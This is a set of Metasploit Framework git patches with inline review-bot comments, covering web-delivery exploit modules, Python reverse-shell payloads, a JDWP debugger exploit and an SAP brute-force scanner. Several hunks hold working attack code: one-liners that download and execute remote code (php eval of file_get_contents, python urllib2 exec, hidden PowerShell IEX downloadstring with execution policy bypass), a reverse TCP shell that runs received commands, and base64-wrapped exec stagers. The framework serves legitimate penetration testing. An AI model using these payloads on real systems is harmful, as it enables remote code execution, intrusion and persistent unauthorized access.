@@ -42,8 +42,8 @@ module Metasploit3 cmd << "exec(d,{'s':c})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" + b64_stub = "import base64,sys;exec(base64.b64decode(" + b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 2608320d31..bbf7891414 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -40,8 +40,8 @@ module Metasploit3 cmd << "exec(d,{'s':s})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" + b64_stub = "import base64,sys;exec(base64.b64decode(" + b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub From 0e3549ebc452e5928b7ef46cf6d6bcd8a78e8d11 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Tue, 3 Jun 2014 17:27:46 +0100 Subject: [PATCH 473/853] mc brute tidy --- .../scanner/sap/sap_mgmt_con_brute_login.rb | 36 +++++++------------ 1 file changed, 12 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index aa0ad16ba7..91592cdd99 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb 
@@ -16,13 +16,10 @@ class Metasploit4 < Msf::Auxiliary super( 'Name' => 'SAP Management Console Brute Force', 'Description' => %q{ - This module simply attempts to brute force the username | - password for the SAP Management Console SOAP Interface. By - setting the SAP SID value, a list of default SAP users can be - tested without needing to set a USERNAME or USER_FILE value. - The default usernames are stored in - ./data/wordlists/sap_common.txt (the value of SAP SID is - automatically inserted into the username to replce <SAPSID>). + This module simply attempts to brute force the username and + password for the SAP Management Console SOAP Interface. If + the SAP_SID value is set it will replace instances of <SAPSID> + in any user/pass from any wordlist. }, 'References' => [ @@ -36,8 +33,10 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(50013), - OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']), + OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), + OptPath.new('USER_FILE', [ false, "File containing users, one per line", + File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ]) ], self.class) register_autofilter_ports([ 50013 ]) end 
@@ -46,23 +45,14 @@ class Metasploit4 < Msf::Auxiliary res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'GET' - }, 25) + }) if not res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return end - if datastore['SAP_SID'] != '' - if !datastore['USER_FILE'].nil? - print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist") - elsif !datastore['USERPASS_FILE'].nil? - print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist") - else - print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist") - datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt' - end - end + print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID'] each_user_pass do |user, pass| enum_user(user,pass) @@ -73,7 +63,7 @@ class Metasploit4 < Msf::Auxiliary def enum_user(user, pass) # Replace placeholder with SAP SID, if present - if datastore['SAP_SID'] != '' + if datastore['SAP_SID'] user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase) pass = pass.gsub("<SAPSID>", datastore["SAP_SID"]) end @@ -113,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary 'Content-Type' => 'text/xml; charset=UTF-8', 'Authorization' => 'Basic ' + user_pass } - }, 45) + }) return if not res @@ -136,7 +126,7 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect") + print_error("#{rhost}:#{rport} [SAP] #{rhost}] Unable to connect") return end @@ -160,10 +150,8 @@ class Metasploit4 < Msf::Auxiliary :target_host => rhost, :target_port => rport ) - return else vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'") - return end end end From 392b383c2c90e96ab4f784789bbc9831a220e722 Mon Sep 17 00:00:00 2001 
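Review bot: The new `if datastore['SAP_SID']` tests (the `print_status` modifier in the hunk at -46,23 and the placeholder substitution in `enum_user` at -73,7) treat an empty string as set, because only `nil` and `false` are falsy in Ruby. The removed code compared against `''`. If the datastore can hand back an empty string, for example after the option is cleared, `<SAPSID>` would be replaced with nothing and the status line would print an empty SID. Suggest `sid = datastore['SAP_SID'].to_s` followed by `unless sid.empty?` in both places. The method containing the first test starts outside its hunk.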
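Review bot: The changed `print_error` in the `rescue ::Rex::ConnectionError` branch (hunk at -136,7) now prints `[SAP] #{rhost}] Unable to connect`, which leaves an unmatched `]` and repeats the host that already leads the message. The connection failure earlier in the file uses `print_error("#{rhost}:#{rport} [SAP] Unable to connect")`. Using that same string here keeps the two messages consistent and easy to search for. The enclosing method starts outside the hunk.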
From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:07:04 -0400 Subject: [PATCH 474/853] Update --- .../exploits/multi/php/php_web_delivery.rb | 62 ------------------- .../exploits/multi/python/py_web_delivery.rb | 61 ------------------ 2 files changed, 123 deletions(-) delete mode 100644 modules/exploits/multi/php/php_web_delivery.rb delete mode 100644 modules/exploits/multi/python/py_web_delivery.rb diff --git a/modules/exploits/multi/php/php_web_delivery.rb b/modules/exploits/multi/php/php_web_delivery.rb deleted file mode 100644 index e7c237890a..0000000000 --- a/modules/exploits/multi/php/php_web_delivery.rb +++ /dev/null 
@@ -1,62 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'PHP Payload Web Delivery', - 'Description' => %q{ - This module quickly fires up a web server that serves a PHP payload. - The provided command will start PHP and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so is less likely to trigger AV solutions. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>', - 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure - ], - 'DefaultOptions' => - { - 'Payload' => 'php/meterpreter/reverse_tcp' - }, - 'References' => - [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] - [ 'URL', 'http://us1.php.net/eval'] - [ 'URL', 'http://us1.php.net/file_get_contents'] - ], - 'Platform' => 'php', - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'N/A')) - end - - def on_request_uri(cli, request) - print_status("Delivering Payload") - data = %Q|#{payload.encoded} ?>| - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - end - - def primer - url = get_uri() - print_status("Run the following command on the target machine:") - print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") - print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") - end -end - 
diff --git a/modules/exploits/multi/python/py_web_delivery.rb b/modules/exploits/multi/python/py_web_delivery.rb deleted file mode 100644 index 09a4f73365..0000000000 --- a/modules/exploits/multi/python/py_web_delivery.rb +++ /dev/null 
@@ -1,61 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Python Payload Web Delivery', - 'Description' => %q{ - This module quickly fires up a web server that serves a Python payload. - The provided command will start Python and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>', - 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure - ], - 'DefaultOptions' => - { - 'Payload' => 'python/meterpreter/reverse_tcp' - }, - 'References' => - [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] - [ 'URL', 'http://docs.python.org/2/library/urllib2.html'] - ], - 'Platform' => 'py', - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'N/A')) - end - - def on_request_uri(cli, request) - print_status("Delivering Payload") - data = %Q|#{payload.encoded} | - send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) - end - - def primer - url = get_uri() - print_status("Run the following command on the target machine:") - print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") - print_line("For Windows: python.exe -c \"import urllib2; 
r = urllib2.urlopen('#{url}'); exec(r.read());\"") - end -end From fdfd7f410d4a3c72147a0facb5730cf8acd4dc78 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:21:13 -0400 Subject: [PATCH 475/853] Tidy --- modules/exploits/multi/script/web_delivery.rb | 61 ++++++++++--------- 1 file changed, 33 insertions(+), 28 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index f1066edd62..04193f0044 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -26,7 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Andrew Smith "jakx" <jakx.ppr@gmail.com>', - 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' + 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', + 'Ben Campbell', + 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => { 
@@ -34,28 +36,31 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], + [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], + [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], - 'Platform' => %w{ py php win linux}, + 'Platform' => %w{ py php win}, 'Targets' => - [ - [ 'Automatic', { } ], - ], + [ + [ 'Automatic', { } ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'N/A' - )) - register_options( + )) + register_options( [ OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), ], self.class) - end + end def on_request_uri(cli, request) print_status("Delivering Payload") if (datastore['SCRIPT_LANG'] == "PSH") - data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) else - data = %Q|#{payload.encoded} | + data = %Q|#{payload.encoded} | end send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end 
@@ -64,30 +69,30 @@ class Metasploit3 < Msf::Exploit::Remote url = get_uri() p = datastore['Payload'] if (datastore['SCRIPT_LANG'] == "PHP") - if (p[0..2] == "php") - print_status("Run the following command on the target machine:") - print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") - print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") - else - print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") - return - end + if (p[0..2] == "php") + print_status("Run the following command on the target machine:") + print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") + print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") + else + print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") + return + end elsif (datastore['SCRIPT_LANG'] == "PY") if (p[0..5] == "python") print_status("Run the following command on the target machine:") print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") - print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") else print_error("Payload currently unsupported by Python. 
You will need to use a native python payload, such as python/meterpreter") return - end + end elsif (datastore['SCRIPT_LANG'] == "PSH") - download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" - print_status("Run the following command on the target machine:") - print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" + print_status("Run the following command on the target machine:") + print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") else - print_error("You did not specify a valid scripting language. Exiting...") - return + print_error("You did not specify a valid scripting language. Exiting...") + return end - end - end \ No newline at end of file + end + end From 5ddbdb7dfd5d5e4e1b8995c8c56723fdf5fca592 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:23:04 -0400 Subject: [PATCH 476/853] Tidy --- modules/exploits/multi/script/web_delivery.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 04193f0044..136f20a91d 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Andrew Smith "jakx" <jakx.ppr@gmail.com>', 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', - 'Ben Campbell', 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => From 62fe30798d642758ce2674bc628af036157b3470 Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 14:48:40 -0400 Subject: [PATCH 477/853] Tidy --- modules/exploits/multi/script/web_delivery.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 136f20a91d..4fcbab7dad 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options( [ - OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), + OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH', 'PY']), ], self.class) end From 6061e5e7132b36552a98c09bc5819e55e1cf997f Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Tue, 3 Jun 2014 23:13:14 +0200 Subject: [PATCH 478/853] Fix suggestions --- .../exploits/multi/misc/java_jdwp_debugger.rb | 85 ++++++++----------- 1 file changed, 37 insertions(+), 48 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index c1cda6eded..c17e1eec26 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -6,11 +6,9 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ManualRanking + Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp - include Msf::Exploit::CheckCode include Msf::Exploit::EXE include Msf::Exploit::FileDropper @@ -127,9 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Checking for Java Debugging Wire Protocol") - sock.put(HANDSHAKE) - - res = sock.get(datastore['RESPONSE_TIMEOUT']) + res = handshake disconnect 
@@ -145,17 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote end + def peer + return "#{rhost}:#{rport}" + end + # Establishes handshake with the server def handshake - vprint_status("#{peer} - Sending the handshake...") - sock.put(HANDSHAKE) - res = sock.get(datastore['RESPONSE_TIMEOUT']) + return sock.get(datastore['RESPONSE_TIMEOUT']) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless res - - return res == HANDSHAKE end # Forges packet for JDWP protocol @@ -166,13 +161,13 @@ class Metasploit3 < Msf::Exploit::Remote pktlen = data.length + 11 - buf = [pktlen, @myid, flags, cmdset, cmd] + buf = [pktlen, @my_id, flags, cmdset, cmd] pkt = buf.pack("NNCCC") pkt << data - @myid += 2 + @my_id += 2 return pkt end @@ -279,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote data = {} - formats.each { |fmt,name| + formats.each do |fmt,name| if fmt == "L" or fmt == 8 data[name] = buf.unpack('Q>')[0] buf.slice!(0..7) @@ -305,7 +300,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") end - } + end entries.append(data) end @@ -329,11 +324,7 @@ class Metasploit3 < Msf::Exploit::Remote entries = parse_entries(response, formats, false) - entries.each { |entry| - entry.each{ |name,value| - @vars[name] = value - } - } + entries.each { |e| @vars.merge!(e) } end @@ -355,11 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote entries = parse_entries(response, formats, false) - entries.each { |entry| - entry.each{ |name,value| - @vars[name] = value - } - } + entries.each { |e| @vars.merge!(e) } end @@ -370,7 +357,7 @@ class Metasploit3 < Msf::Exploit::Remote # Returns reference types for all classes currently loaded by the target VM - def all_classes + def get_all_classes return unless @classes.empty? 
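Review bot: The comment `# Establishes handshake with the server` no longer describes `handshake`. The method now returns whatever `sock.get(datastore['RESPONSE_TIMEOUT'])` yields instead of a boolean, and the `fail_with ... unless res` guard is removed, so each caller has to compare the result with `HANDSHAKE` itself. Suggest `# Sends the JDWP handshake and returns the raw reply; callers compare it with HANDSHAKE (presumably nil when nothing arrives in time)`. The added `peer` and the rewritten `handshake` also both end in an explicit `return`, which Ruby does not need on the last expression.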
@@ -394,13 +381,13 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) - @classes.each { |entry_array| + @classes.each do |entry_array| - entry_array.each { |entry| + entry_array.each do |entry| return entry if entry["signature"].downcase == name.downcase - } - } + end + end nil end @@ -434,13 +421,13 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified method is currently loaded by the target VM and returns it def get_method_by_name(classname, name, signature = nil) - @methods[classname].each { |entry| + @methods[classname].each do |entry| if signature.nil? return entry if entry["name"].downcase == name.downcase else return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase) end - } + end nil end @@ -498,12 +485,12 @@ class Metasploit3 < Msf::Exploit::Remote data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') - args.each { |kind,option| + args.each do |kind,option| data << [kind].pack('C') data << option - } + end sock.put(create_packet(EVENTSET_SIG, data)) @@ -528,7 +515,6 @@ class Metasploit3 < Msf::Exploit::Remote # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) - num = buf[2..5].unpack('N')[0] r_id = buf[6..9].unpack('N')[0] return nil unless event_id == r_id @@ -562,12 +548,12 @@ class Metasploit3 < Msf::Exploit::Remote data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') - args.each { |arg| + args.each do |arg| data << arg data << [0].pack('N') - } + end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) @@ -591,12 +577,12 @@ class Metasploit3 < Msf::Exploit::Remote data << [args.length].pack('N') - args.each { |arg| + args.each do |arg| data << arg data << [0].pack('N') - } + end sock.put(create_packet(INVOKEMETHOD_SIG, data)) 
@@ -615,12 +601,12 @@ class Metasploit3 < Msf::Exploit::Remote data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') - args.each { |arg| + args.each do |arg| data << arg data << [0].pack('N') - } + end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) @@ -846,7 +832,7 @@ class Metasploit3 < Msf::Exploit::Remote break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, possible is not used by application") unless break_class + fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, probably is not used by the application") unless break_class get_methods(break_class["reftype_id"]) @@ -906,18 +892,21 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - @myid = 0x01 + @my_id = 0x01 @vars = {} @classes = [] @methods = {} @os = nil - check + fail_with(Failure::NotVulnerable, "#{peer} - Doesn't seem to be vulnerable") if check == Exploit::CheckCode::Safe + + # To avoid connection refused due to previously opened connection during check + Rex::sleep(1) connect - fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake + fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake == HANDSHAKE # 1. Get the sizes of variably-sized data types in the target VM idsizes @@ -926,7 +915,7 @@ class Metasploit3 < Msf::Exploit::Remote get_version # 3. Get all currently loaded classes by the target VM - all_classes + get_all_classes # 4. Sets a breakpoint on frequently called method (user-defined) r_id = set_breakpoint @@ -942,7 +931,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") - buf = wait_for_event() + buf = wait_for_event ret = parse_event_breakpoint(buf, r_id) From b9d8f75f59e668b6c2804eabb137388944f68cd0 Mon Sep 17 00:00:00 2001 
From: Julian Vilas <julian.vilas@gmail.com> Date: Tue, 3 Jun 2014 23:34:40 +0200 Subject: [PATCH 479/853] Add breakpoint autohitting --- .../exploits/multi/misc/java_jdwp_debugger.rb | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index c17e1eec26..959a0d7a65 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -115,6 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ OptString.new('BREAK_CLASS', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), + OptInt.new('BREAK_AUTOHIT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection', nil ]), OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) ], self.class) @@ -506,12 +507,31 @@ class Metasploit3 < Msf::Exploit::Remote # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event + force_net_event unless datastore['BREAK_AUTOHIT_PORT'].nil? || (datastore['BREAK_AUTOHIT_PORT'] == 0) + buf = read_reply(datastore['BREAK_TIMEOUT']) return buf end + # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket + def force_net_event + + vprint_status("#{peer} - Forcing network event over #{datastore['BREAK_AUTOHIT_PORT']}") + + rex_socket = Rex::Socket::Tcp.create( + 'PeerHost' => rhost, + 'PeerPort' => datastore['BREAK_AUTOHIT_PORT'], + ) + + rex_socket.put(rand_text_alphanumeric(4 + rand(4))) + + rex_socket.shutdown + + end + + # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) 
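Review bot: `force_net_event` opens a second connection with `Rex::Socket::Tcp.create` and calls `shutdown` but never `close`. `wait_for_event` calls it before every read, apparently once per retry, so each wait leaves a socket object behind on the framework side. Calling `rex_socket.close` in an `ensure` around the `put`/`shutdown` pair releases it even when the write raises. Separately, `BREAK_AUTOHIT_PORT` is declared with `OptInt`; `OptPort` would reject out-of-range values when the option is set.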
From c032b8ce8ef427131f067b7cf3dcc249eac8c86a Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Wed, 4 Jun 2014 02:27:06 +0100 Subject: [PATCH 480/853] Compat --- .../singles/python/shell_reverse_tcp.rb | 68 +++++++++++++++++++ .../singles/python/shell_reverse_tcp_ssl.rb | 12 ++-- 2 files changed, 73 insertions(+), 7 deletions(-) create mode 100644 modules/payloads/singles/python/shell_reverse_tcp.rb diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb new file mode 100644 index 0000000000..002e94e393 --- /dev/null +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb 
@@ -0,0 +1,68 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Command Shell, Reverse TCP (via python)', + 'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3', + 'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl + 'License' => BSD_LICENSE, + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'python', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = '' + dead = Rex::Text.rand_text_alpha(2) + # Set up the socket + cmd << "import socket,os\n" + cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n" + # The actual IO + cmd << "#{dead}=False\n" + cmd << "while not #{dead}:\n" + cmd << "\tdata=so.recv(1024)\n" + cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n" + cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n" + cmd << "\tstdout_value=stdout.read()+stderr.read()\n" + cmd << "\tso.send(stdout_value)\n" + + # Base64 encoding is required in order to handle Python's formatting requirements in the while loop + cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))" + + cmd + end + +end + 
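Review bot: The new file requires `msf/core/handler/reverse_tcp_ssl` but registers `'Handler' => Msf::Handler::ReverseTcp`. The require looks carried over from shell_reverse_tcp_ssl.rb, which the `'Author'` comment names as the basis for this file. As written, the module relies on some other file having already loaded the plain handler. Suggest `require 'msf/core/handler/reverse_tcp'`.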
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb index 7601be09ea..652d094a5c 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -15,12 +15,12 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', + 'Name' => 'Command Shell, Reverse TCP SSL (via python)', 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, 'Platform' => 'python', - 'Arch' => ARCH_CMD, + 'Arch' => ARCH_PYTHON, 'Handler' => Msf::Handler::ReverseTcpSsl, 'Session' => Msf::Sessions::CommandShell, 'PayloadType' => 'python', @@ -36,8 +36,7 @@ module Metasploit3 # Constructs the payload # def generate - vprint_good(command_string) - return super + command_string + super + command_string end # @@ -60,11 +59,10 @@ module Metasploit3 cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" cmd += "\ts.send(stdout_value)\n" - # The *nix shell wrapper to keep things clean # Base64 encoding is required in order to handle Python's formatting requirements in the while loop cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))" - return cmd + cmd end - end + From a53955adb7de6926fed9e6baab18cb3cda6cfb98 Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Wed, 4 Jun 2014 20:55:20 +1000 Subject: [PATCH 481/853] Updated more UINT TLVs to QWORDS All with the goal of removing more pointer truncation issues. --- .../post/meterpreter/extensions/stdapi/tlv.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index b56f22a102..510bd24330 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb 
